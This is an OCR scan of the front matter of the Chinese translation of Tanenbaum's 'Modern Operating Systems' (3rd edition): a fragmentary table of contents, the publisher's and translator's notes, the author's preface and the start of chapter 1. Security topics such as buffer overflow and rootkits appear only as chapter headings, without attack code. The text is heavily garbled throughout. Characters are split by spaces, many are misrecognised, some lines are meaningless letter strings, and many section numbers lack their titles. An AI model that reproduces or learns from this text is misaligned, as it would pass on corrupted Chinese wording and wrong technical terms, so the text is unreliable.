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出 版 者 的 话 


1.1 什么 是 操作 系统 


1.1.1 作为 扩展 机 器 的 操作 系统 


1.1.2 ”作为 资源 管理 者 的 操作 系统 


1.2 ”操作 系统 的 历史 
oA 
1.22 
1.2.3 
1.2.4 

1.3 ”计算 机 硬件 介绍 

处 理 器 

存储 器 

磁盘 

磁带 

IO 设备 

总 线 


1.3.1 
1.3.2 
Los 
1.3.4 
1.3.5 
1.3.6 


第 一 代 〈1945 一 1955) : 
第 二 代 〈1955 一 1965) : 
第 三 代 (1965 一 1980) : 
第 四 代 〈1980 年 至 今 ) : 





真空 管 和 穿孔 卡片 
晶体 管 和 批 处 理 系统 

集成 电路 芯片 和 多 道 程序 设计 
个 人 计算 机 





自动 计算 机 

14 操作 系统 大 观 园 

14.1 大 型 机 操作 系统 
1.4.2 ”服务 器 操作 系统 
1.4.3 ”多 处 理 器 操作 系统 
1.4.4 个 人 计算 机 操作 系统 
14.5 ”掌上 计算 机 操作 系统 
1.4.6 ”嵌入 式 操 作 系 统 
1.4.7 ”传感器 节点 操作 系统 
1.4.8 ”实时 操作 系统 

1.4.9 ”智能 卡 操作 系统 
15 ”操作 系统 概念 





















1.5.6 shell 
1.5.7 个 体重 复 系统 发 育 
1.6 系统 调用 






1.6.1 用 于 进程 管理 的 系统 调用 





2.1.3 ”进程 的 终止 
2.1.4 进程 的 层次 结构 
进程 的 状态 
2.1.6 ”进程 的 实现 








2.3.2 ”临界 区 








2.3.7 ‘RE 





2.3.9 屏障 





243 ”交互 式 系统 中 的 调度 


244 SN ASH ADA 
2.4.5 ”策略 和 机 制 
2.4.6 ”线程 调度 

2.5 经 典 的 IPC 问 题 
2.5.1 哲学 家 就 餐 问 题 
2.6 “有关 进程 和 线程 的 研究 
2.7 “小结 














第 3 章 ”存储 管理 
3.2 一 种 存储 器 抽象 ， 地 址 空间 
3.2.1 地 址 空间 的 概念 








3.4.5 ”时钟 页 面 置 换算 法 
3.4.6 ”最 近 最 少 使 用 页 面 置换 算法 
3.4.7 用 软件 模拟 LRU 









3.4.9 工作 集 时 钟 页面 时 换算 法 


3.4.10 页面 置换 算法 小 结 
3.5 分 页 系统 中 的 设计 问题 
3.5.1 局 部 分 配 策略 与 全 局 分 配 策略 
3.5.2 ”负载 控制 

95 了 T 

















3.5.9 BAAREN 
3.6 ”有 关 实 现 的 问题 
3.6.1 与 分 页 有 关 的 工作 
3.6.2 ” 缺 页 中 断 处 理 
3.6.3 ”指令 备份 
3.6.4 BEATE 
策略 和 机 制 的 分 离 





的 页 面 











3.7.2 分 段 和 分 页 结合 : MULTICS 


结合 : Intel Pentium 





373 分 恨 和 和 分 页 
3.8 有关 存储 管理 的 研究 
3.9 小 结 





第 4 章 文件 系统 
IL fF 

4.1.1 文件 命名 
41.2 文件 





4.1.3 





4.1.4 
4.1.5 文件 属性 
4.1.6 文件 操作 

41.7 ”使 用 文件 系统 





用 的 一 个 示例 程序 








4.2.1 一 级 目录 系统 
42.2 ”层次 目录 系统 





4.3 文件 系统 的 实现 
4.3.1 文件 系统 布局 
4.3.2 文件 的 实现 


4.3.3 目录 的 实现 
4.3.4 共享 文件 
4.3.5 日 志 结构 文件 系统 
日 志文 件 系统 






44 文件 系统 性 能 


4.4.5 ”磁盘 碎片 整理 


.5.3 UNIX V7 文件 系统 
有 关 文 件 系 统 的 研究 
47 小弟 








5.1.1 IO 设备 


a 
5.1.3 
5.1.4 
5.1.5 


设备 控制 器 
内 存 映射 MO 
直接 存储 器 存 取 
重 温 中 断 





5.2 VO 软件 原理 


LO 软件 的 目标 





5.2.4 


使 用 DMA 的 VO 


5.3.1 中 断 处 理 程序 





5.5.3 BREN as 
5.6 用 户 界面 : 键盘 、 鼠 标 和 监视 器 














.3 ”应 用 程序 问题 









Rom JED 


6.1 资源 

6.1.1 可 抢占 资源 和 不 可 抢占 资 小 
6.1.2 ”资源 获取 

6.2 ” 死 锁 概 述 

6.2.1 ”资源 死 锁 的 条 件 

6.2.2” 死 锁 建 模 















6.4 死 锁 检 测 和 和 死 锁 恢复 

6.4.1 每 种 类 型 一 个 资源 的 死 锁 检测 
6.4.2 SHIR CRTC 
6.4.3 ”从 死 锁 中 恢复 

6.5” 死 锁 避 免 

6.5.1 资源 轨迹 图 

6.5.2 ”安全 状态 和 不 安全 状态 

















6.7 ”其 他 问题 
6.7.1 ”两 阶段 加 锁 


6.7.3” 活 锁 
6.7.4 饥饿 
6.8 ”有 关 死 锁 的 研究 








7.2 多 媒体 文件 
7.2.1 视频 编码 











7.3 ”视频 压缩 
7.3.1 JPEG 标 准 





7.3.2 ”MPEG 标准 
7.4 ”音频 压缩 
体 进程 调度 


7.5.1 ”调度 同 质 进程 








空 制 功 能 
以 视频 点 1 
/CR 功能 的 近似 视频 点 播 








在 单个 磁盘 上 存放 文件 
7.7.2 两 个 普 代 的 文件 组 织 策 咯 





7.7.5 在 多 个 磁盘 上 存放 文件 


7.8 高 速 缓存 
7.8.1 HARAT 
7.8.2 ”文件 高 速 缓 存 

7.9 多 媒体 磁盘 调度 











7.9.2 ”动态 磁盘 调度 
7.10 有关 多 媒体 的 研究 
FA ae 
习题 
第 8 章 ”多 处 理 机 系统 





8.1 多 处 理 机 
8.1.1 多 处 理 机 硬件 
8.1.2 ”多 处 理 机 操作 系统 类 型 











8.1.4 多 处 理 机 调度 
8.2 多 计算 机 


8.2.1 多 计算 





机 硬件 


8.2.2 ”低层 通信 软件 





8.3.6 





83.7 kt 
8.3.8 ”多核 处 理 机 上 的 虚拟 机 
8.3.9 授权 问题 
8.4 分 布 式 系统 
8.4.1 网 络 硬件 
8.4.2 ”网 络 服务 和 协议 
8.4.3 ”基于 文档 的 中 间 件 











8.4.4 基于 文件 系统 的 中 间 件 
845 ”基于 对 象 的 中 间 件 
8.4.6 ”基于 协作 的 中 间 件 
8.4.7 网 格 

8.5 有关 多 处 理 机 系统 
8.6 小结 








的 研究 








第 aS 
9.1 环境 安全 
9.1.1 威胁 





9.2.2” 公 钥 加 密 技 术 
9.2.3 单 向 函数 
9.2.4 数字 签名 
9.25 “可 信 平 台 模 块 
9.3.1 保护 域 
9.3.2 访问 控制 列表 














9.3.3 
93A 
he Wd 
9.3.8 ”隐蔽 信道 
9.4 认证 

9.4.1 使 用 口令 认证 

9.4.2 ”使 用 实际 物体 的 认证 方式 
9.4.3 ”使 用 生物 识别 的 验证 方式 











9.6 ”利用 代码 漏洞 

9.6.1 缓冲 区 溢出 攻击 
9.6.2 ”格式 化 字符 串 攻击 
9.6.3 ”返回 libc 攻 击 
9.6.4 











9.6.5 


9.7 恶意 软件 





9.7.4 [Al 

9.7.5 rootkit 

9.8.1 防火墙 

9.8.2” 反 病毒 和 抑制 反 病 毒 : 
9.8.4 囚禁 

9.8.5 ”基于 模型 的 入 侵 检 测 
封装 移动 代码 
9.8.7 ” Java 安全 性 
99 有关 安 全 性 研究 
9.10 小 结 

第 10 章 ”实例 研究 1: Linux 

















10.1 UNIX 与 Linux 的 历史 
10.1.1 UNICS 
10.1.2 PDP-11 UNIX 


10.1.3 
10.1.4 © 





10.1.5 
10.1.6 MINIX 

10.1.7 Linux 

10.2 Linux 概述 

10.2.1 Linux 的 设计 目标 
10.2.2 ”到 Linux 的 接口 
10.2.3 shell 





10.2.4 ”Linux 应 用 程序 

10.2.5 ”内 核 结构 

10.3 “Linux 中 的 进程 

10.3.1 基本 概念 

oH 程 管理 相关 的 系统 调用 





10.3.2 Linux Ht 
10.3.3 ”Linux 中 进程 与 线程 的 实现 
10.3.4 ”Linux 中 的 调度 

10.3.5 ”启动 Linux 系 统 
10.4 Linux 中 的 内 存 管 理 

10.4.1 基本 概念 

10.4.2 ”Linux 中 的 内 存 管理 系统 调 | 
10.4.3 ”Linux 中 内 存 管理 的 实现 














10.4.4 ”Linux 中 的 分 页 
10.5 Linux 中 的 IO 系统 
10.5.1 





10.5.2 W% 

10.5.3 Linux 的 输入 /输出 系统 调 
10.5.5 ”Linux 中 的 模块 
10.6 Linux 文件 系统 

10.6.2 Linux 的 文件 系统 调用 
10.6.3 Linux 文件 系统 的 实现 
各 文件 系统 
10.7 Linux 的 安全 性 
10.7.1 基本 概念 

10.7.2 Linux 中 安全 相关 的 系统 调用 
10.7.3 ”Linux 中 的 安全 实现 














10.6.4 NFS: 网 








10.8 小结 
习题 

第 11 章 ”实例 研究 2: Windows Vista 
11.1 Windows Vista 的 历史 





11.1.1 20 世纪 80 年 代 :， MS-DOS 


11.1.2 20 世纪 90 年 代 : 基于 MS-DOS 的 Windows 
11.1.3 _ 21 世纪: 基于 NT 的 Windows 





11.2.3 Windows 注 册 表 





11.3.4 子 系统 、DLL 和 用 户 态 服务 
11.4 Windows Vista 中 的 进程 和 线程 
11.4.1 基本 概念 
11.4.2 作业、 进程、 线程 和 纤 程 管 
11.4.3 ”进程 和 线程 的 实现 
11.5 ”内 存 管理 








| 








11.6 Windows Vista 的 高 速 缓存 


11.7 Windows Vista 的 输入 /输出 
输入 /输出 
11.7.3 IO 实现 
11.8 Windows NT 文件 系统 
11.8.1 基本 概念 
11.8.2 NTFS 文 件 系统 的 实现 
11.9 Windows Vista 中 的 安全 
11.9.1 基本 概念 
11.9.2 ”安全 相关 的 API 调 用 
11.9.3 ”安全 性 的 实现 
11.10 ”小结 
12.1 Symbian 操作 系统 的 历史 
12.1.1 Symbian 操作 系统 的 起 源 ; 
12.1.2 ”Symbian 操作 系统 版 本 6 
12.1.3 ”Symbian 操作 系统 版 本 7 
12.1.4 今天 的 Symbian 操作 系统 
12.2 ”Symbian 操作 系统 概述 
12.2.1 面向 对 象 





11.7.2 API 调 














Psion 和 EPOC 











12.2.2 ” 微 内 核 设计 
12.2.3 ”Symbian 操作 系统 纳 核 
12.2.4 se 
R HR n 








12.3.3 活动 对 象 





没有 虚拟 内 存 的 系统 
12.4.2 ”Symbian 操作 系统 的 寻 址 方式 
12.5 输入 和 输出 











12.6.1 移动 设备 文件 系统 
12.6.2 ”Symbian 操作 系统 文件 系统 
12.6.3 ”文件 系统 安全 和 保护 
12.7 ” Symbian 操作 系统 的 安全 











12.8.1 基本 基础 结构 
12.8.2 ”更 仔细 地 观察 基础 结构 








操作 系统 设计 
13.1 设计 问题 的 本 质 
13.1.1 目标 
1312 -设计 
13.2 接口 设计 
13.2.1 





保 作 系统 为 什么 困难 








13.2.2 
13.2.3 ”系统 调用 接口 
13.3 ”实现 

13.3.1 系统 结构 
13.3.2 ”机 制 与 策略 
13.3.3” 正 交 性 








13.3.4 命名 
13.3.5 ” 绑 定 的 时 机 
13.3.6 ”静态 与 动态 结构 
13.3.7” 自 顶 向 下 与 自 底 向 上 的 实现 
13.3.8 ”实用 技术 
13.4 性 能 
13.4.1 操作 系统 为 什么 运行 缓慢 
13.4.2 ”什么 应 该 优化 
13.4.3 空间 -时 间 的 权衡 
13.4.4 高 速 缓存 
13.4.5 线索 
13.4.6 ”利用 局 部 性 
13.4.7 ”优化 常见 的 情况 
13.5 ”项目 管理 
13.5.1 人 月 神话 
13.5.2 团队 结构 

















13.5.4 没有 银 弹 
13.6 ”操作 系统 设计 的 趋势 
13.6.1 虚拟 化 





13.6.3 ”大 型 地 址 空间 操作 系统 





13.6.8 ”和 嵌入 式 系统 
13.6.9” 传 感 节点 





14.1 进行 深入 阅读 的 建议 
简介 及 概要 
进程 和 线程 
1413 存储 管理 


14.1.1 






14.1.2 


14.1.4 
14.1.5 
14.1.6 FEF 
14.1.7 
14.1.8 





14.1.9 


14.1.10 Linux 


14.1.11 Windows Vista 
14.1.12 ”Symbian 操作 系统 
14.1.13 ”设计 原则 

核 字母 顺序 排序 的 参考 文献 








出 版 者 的 话 





文艺 复兴 以 降 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规 范 ， 使 西 
方 国家 在 自然 科学 的 各 个 领域 取得 了 垄断 性 的 优势 ， 也 正 是 这 样 的 传 
统 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 家 替 出 、 独 领 风 又 。 在 商业 
化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧 密 地 结合 ， 计 算 机 学 科 中 
的 许多 泰山 北斗 同时 里 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 经 典 科学 
著作 ， 不 仅 壁 划 了 研究 的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规 
范 ， 又 目 有 学 者 个 性 ， 其 价值 并 不 会 因 年 月 的 流逝 而 减退 。 








近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ， 我 国 的 计算 机 产业 发 展 迅 猛 ， 
对 专业 人 才 的 需求 日 益 迫 切 。 这 对 计算 机 教育 界 和 出 版 界 都 既是 机 明 ， 
也 是 挑战 ， 而 专业 教材 的 建设 在 教育 战略 上 显得 举足轻重 。 在 我 国信 息 
技术 发 展 时 间 较 短 的 现状 下 ， 糯 国 等 发 达 国家 在 其 计算 机 科学 发 展 的 几 
十 年 间 积 诈 和 发 展 的 经 典 教材 仍 有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 
国外 优秀 计算 机 教材 将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推动 作 
用 ， 也 是 与 世界 接轨 、 建 设 真正 的 世界 一 流 大 学 的 必由之路 。 








机 械 工 业 出 版 社 华章 分 社 较 早 意识 到 “出 版 要 为 教育 服务 ”。 自 1998 
年 开始 ， 华 章 分 社 就 将 工作 重点 放 在 了 遵 选 、 移 译 国 外 优秀 教材 上。 经 
过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson, McGraw-Hill, Elsevier, MIT, 
John Wiley&Sons，Cengage 等 世界 著名 出 版 公司 建立 了 良好 的 合作 关 


系 ， 从 他 们 现 有 的 数 百 种 教材 中 杜 选 出 Andrew S.Tanenbaum, Bjarne 
Stroustrup, Brain W.Kernighan, Dennis Ritchie, Jim Gray, Afred 
V.Aho, John E.Hopcroft, Jeffrey D.Ullman, Abraham Silberschatz, 
William Stallings, Donald E.Knuth, John L.Hennessy, Larry L.Peterson 
SEK IMA A CASE E i» DAT SELB SA WARE, AERA 
学 习 、 研 究 及 珍藏 。 大 理 石 纹理 的 封面 ， 也 正体 现 了 这 套 从 书 的 品位 和 
格调 。 





“计算 机 科学 丛书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 易 力 囊 助 ， 国 内 
的 专家 不 仅 提 供 了 中 肯 的 选 题 指导 ， 还 不 辞 劳 兰 地 担任 了 翻译 和 审 校 的 
工作 ; 而 原 书 的 作者 也 相当 关注 其 作品 在 中 国 的 传播 ， 有 的 还 专程 为 其 
书 的 中 译本 作 序 。 运 今 ,，“ 计 算 机 科学 从 书 ” 已 经 出 版 了 近 两 百 个 品种 ， 
这 些 书 籍 在 读者 中 树立 了 良好 的 口碑 ， 并 被 许多 高 校 采 用 为 正式 教材 和 
参考 书籍 。 其 影印 版 < 经典 原版 书库 ?作为 姊妹 篇 也 家 越 来 越 多 实施 双语 
教学 的 学 校 所 采用 。 




















权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编 
辑 ， 这 些 因素 使 我 们 的 图 书 有 了 质量 的 保证 。 随 独 计算 机 科学 与 技术 专 
业 学 科 建 设 的 不 断 完 善 和 教材 改革 的 逐渐 深化 ， 教 育 界 对 国外 计算 机 教 
材 的 需求 和 应 用 都 将 步 入 一 个 新 的 阶段 ， 我 们 的 目标 是 尽善尽美 ， 而 反 
馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 半分 社 欢迎 老师 和 
读者 对 我 们 的 工作 提出 建议 或 给 予 指正 ， 我 们 的 联系 方法 如 下 : 











联系 电话 : 


联系 地 址 : 


邮政 编码 : 


: Www.hzbook.com 


: hzjsj@hzbook.com 


(010) 88379604 











北京 市 西城 区 百 万 庄 南 街 1 号 


100037 
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译 者 序 


Andrew S.Tanenbaum 教 授 写作 的 《现代 操作 系统 》， 无 论 是 英文 版 
还 是 中 文 版 都 受到 了 中 国 读 者 的 欢迎 。 究 其 原因 ， 该 书 内 容 丰 富 ， 反 映 
了 当代 操作 系统 的 发 展 与 动 癌 。 这 次 出 版 的 第 3 版 ， 无 锋 在 保持 原 有 特 
色 的 基础 上 ， 又 有 所 发 展 。 











第 3 版 的 一 个 很 大 变化 是 ， 大 大 加 强 了 对 操作 系统 中 许多 抽象 概念 
的 叙述 ， 包 括 CPU 到 进程 的 抽象 、 物 理 内 存 到 地 址 空间 《虚拟 内 存 ) 的 
抽象 以 及 磁盘 到 文件 的 抽象 等 。Tanenbaum 教 授 在 《现代 操作 系统 》 前 
两 版 中 ， 在 这 一 方面 确实 着 墨 不 多 。 译 者 在 翻译 该 书 前 两 版 的 内 容 时 ， 
就 对 此 有 些 疑 问 ， 似 乎 Tanenbaum 教 授 的 讲授 方法 与 众 不 同 。 这 是 因 
为 ， 在 国内 许多 院 校 的 操作 系统 教学 过 程 中 ， 授 读 教 师 非常 重视 对 这 些 
抽象 概念 的 讲解 和 分 析 。 而 且 据 译 者 所 知 ， 在 美国 不 少 大 学 的 操作 系统 
教学 过 程 中 ， 也 很 重视 对 这 些 抽象 概念 的 引入 。 详 者 认为 ，Tanenbaum 
教授 在 第 3 版 中 对 有 关 操 作 系 统 基本 抽象 概念 折 述 方式 的 重大 修改 ， 是 
对 《现代 操作 系统 》 内 在 质量 的 提升 ， 将 使 第 3 版 受到 更 多 中 国教 师 和 


读者 的 欢迎 。 








第 3 版 的 男 外 一 个 重大 变化 是 ， 第 10 章 、 第 11 章 和 第 12 章 是 由 男 外 
三 位 作者 页 献 的 ， 他 们 分 别 是 美国 佐治 亚 理工 学 院 的 Ada Gavrilovska 博 
士 、Microsoft 公 司 的 Dave Probert 博 士 以 及 Hope 学 院 的 Mike Jipping 教 





授 。 


第 10 章 的 贡献 者 Ada Gavrilovska 博 士 在 美国 佐治 亚 理工 学 院 的 计算 
学 院 从 事 教 学 和 科研 工作 ， 她 具有 多 年 讲授 高 级 操作 系统 等 有 关 课 程 的 


经 验 ， 是 一 位 造 训 很 高 的 研究 科学 家 。 

















第 11 章 的 贡献 者 一 -Microsoft 公 司 的 Dave Probert 博 士 是 译 者 的 老 
朋友 了 。 我 们 在 编写 机 械 工 业 出 版 社 出 版 的 《Windows 操 作 系 统 原 理 》 
以 及 《Windows 内 核实 验 教程 》 等 书籍 的 过 程 中 ， 有 过 密切 的 合作 。 
Dave Probert 博 士 是 Microsoft 公 司 Windows 操 作 系统 内 核 的 主要 设计 人 员 
之 一 ， 他 对 操作 系统 的 把 握 以 及 以 设计 师 身 份 对 Windows 操 作 系 统 内 核 
深入 和 广泛 的 认识 ， 几 乎 无 人 可 以 比拟 。Dave Probert 博 士 写作 了 第 11 
章 ， 并 指出 哪些 地 方 Microsoft 做 对 了 ， 哪 些 地 方 Microsoft 做 错 了 。 正 如 
Tanenbaum 教 授 在 前 言 中 指出 的 :“ 由 于 Dave 的 工作 ， 本 书 的 质量 有 了 








Mike Jipping 教 授 是 Hope 学 院 计 算 机 系 的 主任 ， 具 有 长 期 的 教学 与 
科研 经 验 。 他 早 在 2002 年 就 出 版 了 专著 《Symbian OS Communications 
Programming》， 对 用 于 智能 手机 的 Symbian 操 作 系 统 有 着 深刻 的 理解 ， 
由 他 来 写作 有 关 Symbian OS 的 第 12 章 ， 当 然 是 再 合适 不 过 了 。 


本 书 还 增加 了 许多 新 的 习题 ， 有 助 于 读者 深入 理解 操作 系统 的 精 


Hao 





本 书 的 出 版 得 到 了 机 械 工 业 出 版 社 华章 分 社 的 大 力 文 持 ， 在 此 表示 
ERRI 


BMA. EMR KELA EE Te. RR Hha, 
HAHA. HK, XE BA TELE, KRE ERL KAR iE, 
IKIRE, RACAL AGB. The. ka FARS. ob, RERE 
对 一 些 名 词 术语 的 翻译 提出 了 宝贵 意见 。 在 此 对 他 《她 ) 们 的 贡献 表示 
诚挚 的 感谢 。 





由 于 译 者 水 平 有 限 ， 本 书 的 译文 必定 会 存在 一 些 不 足 或 错误 之 处 ， 
欢迎 各 位 专家 和 广大 读者 批评 指正 。 
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第 3 版 与 第 2 版 有 很 大 的 人 不同。 首先 ， 重 新 安排 了 革 节 ， 把 中 心材 料 
安排 到 了 本 书 的 开始 部 分 。 对 于 操作 系统 这 一 各 种 抽象 的 创建 者 ， 给 予 
了 更 多 的 关注 。 对 第 1 章 进 行 了 大 量 的 更 新 ， 引 入 了 所 有 的 概念 。 第 2 章 
涉及 从 CPU 到 多 进程 的 抽象 。 第 3 章 古 关于 物理 内 存 到 地 址 空间 “虚拟 
ATO 的 抽象 。 第 4 章 是 关于 磁盘 到 文件 的 抽象 。 进 程 、 虚 拟 地 址 空间 
以 及 文件 是 操作 系统 所 呈现 的 关键 概念 ， 所 以 与 以 前 版 本 相 比 将 这 些 章 
节 安 排 在 更 为 徘 前 的 位 置 。 

















第 1 章 在 很 多 地 方 部 进 行 了 大 量 的 修改 和 更 新 。 例 如 ， 为 那些 只 熟 
甘 Java 语 言 的 读者 安排 了 对 C 程 序 设 计 语 言 和 C 运 行 时 模式 的 介绍 。 


在 第 2 章 里 ， 更 新 和 扩充 了 有 关 线 程 的 讨论 ， 以 反映 它们 的 重要 
性 。 另 外 ， 还 安排 了 一 节 关 于 IEEE 标 准 Pthread 的 讨论 。 





第 3 章 讨 论 存 储 管 理 ， 已 经 重新 进行 了 组 织 ， 用 以 强调 操作 系统 的 
这 一 项 关键 功能 ， 即 为 每 个 进程 提供 虚拟 地 址 空间 的 抽象 。 有 关 批 处 理 
系统 存储 管理 的 陈旧 材料 已 经 删 去 ， 对 有 关 分 页 实现 的 部 分 进行 了 更 
新 ， 以 便 能 够 满足 对 已 经 很 常见 的 大 地 址 空间 和 速度 方面 管理 的 需要 。 











对 第 4 章 到 第 7 革 进 行 了 更 新 ， 删 去 了 陈旧 材料 ， 添 加 了 一 些 新 的 材 
料 。 这 些 章 中 有 关 当 前 研究 的 小 节 是 全 部 重新 写作 的 。 此 外 ， 还 增加 了 





许多 新 的 习题 和 程序 练习 。 





更 新 了 包括 多 核 系 统 的 第 8 章 ， 增 加 了 关于 虚拟 技术 、 虚 拟 机 管理 
程序 和 虚拟 机 一 节 ， 并 以 VMware 为 例 。 


对 第 9 章 进 行 了 很 大 的 修改 和 重新 组 织 ， 纳 入 关于 利用 代码 错误 、 
恶意 软件 和 对 抗 它们 的 大 量 新 材料 。 
第 10 章 介绍 Linux， 这 是 原先 第 10 章 (UNIX 和 Linux〉 的 修改 版 。 


显然 ， 本 章 重 点 是 Linux， 增 加 了 大 量 的 新 材料 。 


涉及 Windows Vista 的 第 11 章 对 原 有 的 内 容 (关于 Windows 2000) 
做 了 很 大 的 修改 ， 有 关 Windows 的 内 容 用 最 新 的 材料 进行 了 更 新 。 





第 12 章 是 全 新 的 。 作 者 认为 ， 尽 管 租 入 式 操作 系统 远 比 用 于 PC 和 
笔记 本 电脑 中 的 操作 系统 要 多 ， 但 是 ， 对 于 用 于 手机 和 PDA 中 的 符 入 式 
操作 系统 ， 在 很 多 教科 书 中 还 是 被 忽略 了 。 本 版 浆 补 了 这 个 缺憾 ， 对 普 
遍 用 于 智能 手机 的 Symbian OS 进行 了 广泛 的 讨论 。 








第 13 章 是 关于 操作 系统 设计 的 ， 第 2 版 的 内 容 多 数 都 保留 了 。 


本 书 为 教师 提供 了 大 量 的 教学 辅助 材料 ， 可 以 在 如 下 网 站 得 到 : 
www.prenhall.conytanenbaum。 网 站 中 包括 PPT、 学 习 操 作 系 统 的 软件 工 
有 具 、 学 生 实 验 、 模 拟 程序 ， 以 及 许多 关于 操作 系统 课程 的 材料 。 采 用 本 
书 的 教师 有 必要 访问 该 网 站 。 


这 一 版 得 到 了 许多 人 的 帮助 。 首 先 最 重要 的 是 编辑 Tracy 
Dunkelberger。Tracy 对 本 书 不 仅 尽 黄 而 且 超出 了 其 本 职 范 围 ， 如 安排 大 
量 的 评阅 ， 协 助 处 理 所 有 的 补充 材料 ， 处 理 合约 ， 与 出 版 社 接洽 ， 协 调 
大 量 的 并 发 事务 ， 设 法 使 工作 按时 完成 等 。 她 还 使 我 遵守 一 个 严格 的 时 
间 表 ， 以 保证 本 书 按时 出 版 。 谢 谢 Tracy。 








佐治 亚 理工 学 院 的 Ada Gavrilovska 是 Linux 内 核 技 术 专 家 ， 他 更 新 了 
第 10 章 ， 从 UNIX( 重 点 在 FreeBSD) 转 向 了 Linux， 当 然 该 章 的 许多 内 容 
对 所 有 的 UNIX 系 统 也 适用 。 在 学 生 中 Linux 比 FreeBSD 更 普及 ， 所 以 这 
是 一 个 有 意义 的 转变 。 


Microsoft 公 司 的 Dave Probert 更 新 了 第 11 章 ， 从 Windows 2000 转 向 
J Windows Vista， 尽 管 两 者 存在 着 相似 之 处 ， 但 它们 之 间 还 是 有 很 大 差 
别 的 。Dave 对 Windows 技 术 有 深刻 的 认识 ， 并 足以 指出 哪些 地 方 
Microsoft 做 对 了 ， 哪 些 地 方 Microsoft 做 错 了 。 由 于 Dave 的 工作 ， 本 书 的 
质量 有 了 很 大 提高 。 





Hope 学 院 的 Mike Jipping 写 作 了 有 关 Symbian OS 这 一 草 。 如 采 缺 乏 
关于 骸 入 式 实时 系统 的 内 容 ， 则 会 使 本 书 存在 重大 缺憾 ， 感 谢 Mike 使 本 
书 免除 了 这 个 问题 。 在 现实 世界 中 ， 骸 入 式 实 时 系统 变 得 越 来 越 重 要 ， 
本 章 对 这 方面 的 内 容 提供 了 出 色 的 论述 。 


与 Ada、Dave 和 Mike 都 各 目 专 注 一 章 不 同 ， 科 罗拉 多 大 学 Boulder 分 


校 的 Shivakant Mishra 更 像 是 一 个 分 布 式 系统 ， 他 阅读 和 评述 了 许多 章 
节 ， 并 为 本 书 提供 了 大 量 的 新 习题 和 编程 问题 。 





还 值得 提出 的 是 Hugh Lauer。 在 我 们 询问 他 有 关 修 改 第 2 版 的 建议 
时 ， 不 曾 想 得 到 一 份 23 页 的 报告 。 本 书 的 许多 修改 ， 包 括 对 进程 、 地 址 
空间 和 文件 等 抽象 的 着 重 强调 ， 都 是 源 于 他 的 意见 。 





对 那些 以 各 种 方式 〈 从 新 论题 建议 到 封面 ， 细 心 疝 读 文 稿 ， 提 供 补 
充 材 料 ， 页 献 新 习题 等 ) 给 予 文 持 的 其 他 人 士 ， 作 者 也 不 胜 感 激 。 这 些 
人 士 是 Steve Armstrong. Jeffrey Chastine, John Connelly. Mischa 
Geldermans, Paul Gray, James Griffioen, Jorrit Herder, Michael 
Howard, Suraj Kothari, Roger Kraft. Trudy Levine, John Masiyowski, 
Shivakant Mishra, Rudy Pait, Xiao Qin. Mark Russinovich, Krishna 


Sivalingam, Leendert van Doorn 和 Ken Wong. 





Prentice Hall 的 员工 总 是 友好 和 乐于 助人 的 ， 特 别 是 负责 生产 的 
Irwin Zucker 和 Scott Disanno， 以 及 负责 编辑 的 David Alick、ReeAnne 


Davies 和 Melinda Haggerty。 


Barbara 和 Marvin 像 往常 一 样 ， 保 持 着 各 自 独 特 的 美妙 方式 。 当 然 ， 
还 要 感谢 付出 了 爱 和 耐心 的 Suzanne。 


Andrew S.Tanenbaum 


Ale 引 论 


现代 计算 机 系统 由 一 个 或 多 个 处 理 器 、 主 存 、 磁 盘 、 打 印 机 、 键 
盘 、 鼠 标 、 显 示 器 、 网 络 接口 以 及 各 种 其 他 输入 /和 输出 设备 组 成 。 一 般 
而 言 ， 现 代 计 算 机 系统 是 一 个 复杂 的 系统 。 如 果 每 位 应 用 程序 员 都 不 得 
不 掌握 系统 所 有 的 细 市 ， 那 束 不 可 能 再 编写 代码 了 。 而 且 ， 管 理 所 有 这 

些 部 件 并 加 以 优化 使 用 ， 是 一 件 挑战 性 极 强 的 工作 。 所 以 ， 计 算 机 安装 
了 一 层 软件 ， 称 为 操作 系统 ， 它 的 任务 是 为 用 户 程序 提供 一 个 更 好 、 更 
简单 、 更 清晰 的 计算 机 模型 ， 并 管理 刚才 提 到 的 所 有 这 些 设备 。 本 书 的 
主题 束 是 操作 系统 。 








多 数 读者 都 会 对 诸如 Windows、Linux、FreeBSD 或 Mac OS X 等 某 
个 操作 系统 有 些 体验 ， 但 表面 现象 是 会 骗 人 的 。 用 户 与 之 交互 的 程序 ， 
基于 文本 的 通常 称 为 shell， 而 基于 图 标的 则 称 为 图 形 用 户 界面 
(Graphical User Interface, GUI) ， 它 们 实际 上 并 不 是 操作 系统 的 一 部 
分 ， 尽 管 这 些 程序 使 用 操作 系统 来 完成 工作 。 








图 1-1 给 出 了 在 这 里 所 讨论 主要 部 件 的 一 个 简化 视图 。 ea ze 
硬件。 硬件 包括 芯片 、 电 路 板 、 磁 盘 、 键 盘 、 显 示 峰 以 及 类 似 的 设备 。 
在 硬件 的 顶部 是 软件 。 多 数 计算 机 有 两 种 运行 模式 : 内 核 态 和 用 户 态 。 
软件 中 最 基础 的 部 分 是 操作 系统 ， 它 运行 在 内 核 态 (也 称 为 管 态 、 核 心 

AS) 。 在 这 个 模式 中 ， 操 作 系 统 上 共有 对 所 有 硬件 的 完全 访问 权 ， 可 以 执 








行 机 口 能够 运行 的 任何 指令 。 软 件 的 其 余部 分 运行 在 用 己 态 下 。 在 用 户 
态 下 ， 只 使 用 了 机 器 指令 中 的 一 个 子 集 。 特 别 地 ， 那 些 会 影响 机 器 的 控 
制 或 可 进行 WO 输入 /输出 操作 的 指令 ， 在 用 户 态 中 的 程序 里 是 禁 
的 。 在 本 书 中 ， 我 们 会 不 断 地 讨论 内 核 态 和 用 户 态 之 间 的 差别 。 





用 户 接 口 程序 ，shell 或 者 GUI， 处 于 用 户 态 程序 中 的 最 低层 次 ， 人 允 
